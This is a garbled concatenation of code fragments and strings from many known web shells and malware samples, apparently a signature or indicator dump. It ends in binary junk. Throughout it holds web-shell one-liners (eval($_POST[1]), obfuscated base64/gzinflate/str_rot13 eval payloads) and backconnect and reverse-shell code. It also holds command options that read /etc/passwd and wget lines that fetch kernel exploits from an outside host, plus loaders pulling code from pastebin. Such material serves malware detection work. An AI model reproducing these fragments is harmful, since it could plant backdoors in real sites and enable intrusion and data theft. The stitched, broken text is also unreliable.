fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! 
can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and 
directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' 
of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep 
::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? 
\"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? 
\"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int 
i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? 
urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? 
echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. 
command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win 
dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... 
returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + 
victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? 
system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. 
/file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package 
wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which 
wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
Unavailable w7h;
Unavailable kernel32.d`
Unavailable 3<3!1
Unavailable 8%;m
Unavailable d$hd;
Unavailable 4"kv
Unavailable sssx-j
Unavailable 2"sc
Unavailable ;=1_
Unavailable <`t'!u
Unavailable p,s7o
Unavailable h@vc
Unavailable d$d$na
Unavailable 7`rc|
Unavailable !hj5
Unavailable phb45
Unavailable qqqqqqqsvw
Unavailable running on this computer!- promiscuous (capture all packets on the network)active filter for the adapter:
Unavailable i[^r"
Unavailable ucl+
Unavailable ^mc+cp
Unavailable e9za
Unavailable &sx}l)
Unavailable 51gg
Unavailable q@zbi
Unavailable yy{8
Unavailable )#n(
Unavailable `managed vector constructor iterator'
Unavailable d$(i
Unavailable nv12
Unavailable 7z\u
Unavailable .textzxur
Unavailable ni,p
Unavailable #ujr'#.
Unavailable :4oh
Unavailable %s; %s=%scookie: %s=%sh
Unavailable dll:%.8xins:%.8x%.2x%.2x%.2x%.2x>=2
